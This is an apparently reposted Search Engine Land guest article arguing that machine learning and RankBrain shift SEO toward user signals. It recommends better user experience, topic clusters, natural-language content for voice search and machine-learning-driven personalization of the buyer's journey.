Keyword rank is no longer affected by dramatic shifts.
Google’s algorithm is more dynamic; different algorithms are employed for each unique search.
In more competitive niches, content quality and increased user engagement will slowly take precedence over conventional signals, leveling the SERP playing field. In low-volume searches, conventional ranking signals will still be applied as the de facto standard until enough data is available to determine user intent.
This has also brought semantic search to the fore for SEO experts. Semantic search allows content to rank for multiple keywords and get increased traffic by meeting the intent of various related search queries. The clearest example of semantic search’s impact is the related search field at the bottom of Google SERPs and the “People Also Ask” box below the featured snippet field.
As Google becomes capable of understanding human intent and linguistic intelligence, technical SEO and keyword usage will take a back seat to user signals. Considering different algorithms are applied to unique searches, links will be reduced in their role as the arbiters of content quality, and smaller domains will have a better fighting chance to compete against industry titans organically.
If searcher intent determines which algorithm will be pulled for SERP listings, how do we optimize and even track this? The answer involves using both conventional strategies and our own machine learning technology.
Give the people what they want
Here are a few methods SEOs should be using to keep current with the evolving environment:
1. Improve user experience
Searchmetrics’ 2016 report on ranking factors illustrated just how important user signals were to organic ranking. The company found that user signals were second only to content relevance in terms of importance.
One of the best ways that a search engine can determine user intent is by analyzing user signals, which it gathers through its Chrome browser, direct URLs, SERPs and so on. But Google’s most valued user signal remains CTR.
To ensure your web pages deliver good user signals, you must create a solid UX foundation. This means providing thematic continuity across your web pages, creating high-quality and relevant landing pages, using engaging images, offering interactive content, delivering fast page speed and developing an organized internal linking structure.
Metatags and rich snippets can also influence your click-through rate, so optimize for both. Google will obviously lower your rank if your website suffers from a low CTR in a high-ranking result.
Other considerations to keep in mind include:
employing 301 redirects for missing pages and rel=canonical tags for duplicate content.
optimizing structured data and alternative tags to help search engines index content.
resolving any broken links that could affect crawl structure.
Even though Google’s AI and RankBrain are incredibly advanced, Google still needs your help to crawl web pages and index them. It doesn’t hurt that these factors also improve your website’s navigation and user experience.
2. Embrace thematic continuity
Despite all of these advancements in search, I still commonly encounter clients who operate their websites with thin content and no keyword focus. My team begins client campaigns with research on keywords, competitors and some technical aspects.
Recently, though, we began focusing on creating more seamless hierarchical structures that leverage semantically linked keywords and topic clusters to promote an awesome UX. As opposed to simply creating content with a limited keyword focus, we focused on ranking our clients’ most important pages.
HubSpot refers to this exciting new practice as “topic clusters.” Topic clusters focus on pillar pages that represent your most important topics. These will be broad, overarching pages that rank high in your information hierarchy and attempt to discuss and answer the most important questions related to your main topic.
Subtopics are then discussed in greater detail on lower-hierarchy pages that contain internal links back to the pillar page. This strategy helps communicate your most important pages through a sophisticated interlinking structure, promotes seamless navigation and helps position your pillar page to rank for multiple keyword phrases.
These evergreen pieces are also supplemented by a consistent blogging strategy that discusses trending topics related to the website’s theme. Each piece of content produced is actionable and focuses on driving conversion or desired actions.
When modeling each piece of content, it’s important to ask yourself this question: What are the problems this piece of content is seeking to address, and how will it solve them? As more questions pop up, write content addressing these issues. Now you’ve created a website that satisfies user intent from almost every possible perspective. This helps you rank for a lot of keywords.
You can also employ machine learning technology to improve the workflow of your content marketing campaign. Applications, such as the Hemingway App and Grammarly, are excellent tools that can provide suggestions where improvements could be made in sentence structure, author voice and word usage.
3. Employ natural language
Perhaps the best way to optimize for an artificially intelligent search world is to optimize for voice search, as opposed to text search. This involves optimizing your website for mobile and your content to achieve featured snippets, given that answers to questions asked to a personal assistant device are pulled from the featured snippet field on a Google SERP.
In addition to following the strategies outlined thus far, this involves crafting cogent page copy that seeks to answer as many questions as possible and provide actionable solutions.
Research has also shown that people searching by voice, rather than text, are more likely to use search phrases from four to nine words in length. This means you need to optimize for long-tail keyword phrases — which are usually longer in length — and page copy that is more representative of natural language. For example, a text search for flights to Hawaii may be “cheap flights Hawaii,” while a voice search may say, “What are the cheapest flights to Hawaii?”
With the rise of machine learning, optimized content that appeals to natural language could satisfy user intent for both broad match searches over text and long-tail voice searches.
Consider how chatbot assistants incorporate Natural Language Understanding (NLU) to more readily understand linguistic syntax and meanings. With advancements in NLU applications, search engines will eventually be able to entirely assess the meaning and quality of content the same way a human does.
4. Personalize the buyer’s journey
With more big data being created this year than in the past 5,000 years, businesses will need to leverage machine learning technology to interpret vast amounts of user data at an unprecedented speed.
One way this is already being executed is by mining conversational text data from chatbots. As we move from a graphical interface world into a conversational interface, chatbots are being used to map inputs and data from customer journeys to help companies improve their user experience.
This technology is still in its infancy, but we can also apply machine learning technology and data mining to personalize touch points along the buyer’s journey. Customer journey mapping can be used to build out buyer personas and personalize marketing touch points to maximize conversions and sales.
Using customer journey mapping, businesses can personalize touch points to deliver content or advertisements when intent is highest. Real-time responses can be instituted to respond to customer service calls immediately, deliver calls to action to high-scoring leads and segment advertisement campaigns based on real-time data.
Predictive analytics can also be applied to deliver predictions of estimated campaign performances based on real-time data. This will greatly save time on A/B testing and improve campaign efficiency.
Fortunately, machine learning technology can be used by anyone. Given the sheer speed and scale of machine learning applications, relying on conventional SEO strategies to rank organically may eventually put you at an incredible competitive disadvantage.
The future is already passing
Don’t worry, automation won’t totally displace humans any time soon. Machine learning technologies can help augment marketing campaigns, but the creative and execution ultimately rely on the expertise of human intelligence. But we will probably reach a point soon enough that clients will actively seek out digital marketing firms that have expertise in customer journey mapping and AI-enabled applications.
In my opinion, these technologies have the potential to greatly improve the competition for SERPs and will also allow digital marketers to deliver a stronger product.
Some opinions expressed in this article may be those of a guest author and not necessarily Search Engine Land. Staff authors are listed here.
Source
https://searchengineland.com/machine-learning-levels-serp-playing-field-284073
0 notes